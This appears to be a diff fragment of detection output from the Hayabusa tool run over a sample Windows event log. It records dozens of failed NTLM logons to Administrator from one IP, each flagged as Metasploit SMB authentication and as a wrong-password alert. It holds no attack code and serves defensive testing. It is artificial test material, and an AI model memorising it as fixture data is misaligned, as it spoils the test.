+2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AchwW4ifbZ41AQNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PaxF7Q8ue1Kex1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WAhW2PErXdwNVrx5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoAV3ESqieev2JMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFlWFijaFirgsAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSDjuqvzKLaWCWVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SL0CVu787iFRLiPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZQDORN33izpv4tGO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v470yorD43fgGyjC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBbLWVZFDqFxb7dW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJsowt9MrhXciLOZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uhCVFyMmDI5shASV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yd4SM9EGM7cnO6Z5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSR1tbtzdDaJDbXs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rNqyjBuN0Pq6WRO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vqpMAmE9OvHbFCh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfLQAaB0DPvxWQMB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0kvHMwnj2k0HMLQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kPqfVDftcR4iRDaw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bltwm2g13InAJM6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2iFr8ppe5NzukXF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EEUOBohBFRze6hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCOFn3WM71KmaZyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UdUkBxB1auduRfdS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2JaWoYK56HRGfW1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3JTCX9NIOpg6TFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zFGkdUVAdKcrrREB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oZW00FpKema01Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p4HbNQx0Acf83b1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aM5UCQbOLvcpI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGGChEAIdej9lBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CaFYB1ImWAWbH0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLa3lkxWiJ00raQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMzyi0jIVLNrodC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2repX0roAP2j0TI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gqcpIjdkNpmoTe4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edgo9UdNvmMJpiyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LpqOTu7Xn7ULipmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TP0efL79STMbuu9g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HkwWfRi0E5sVY6UT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkyCe9NXGExCQS5r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IGnhRwa7P7by9vJO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fh7IGliNbSyKwxpM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1QfgWsAqSYQfB9l5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8VM66P8Vluf7yrL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
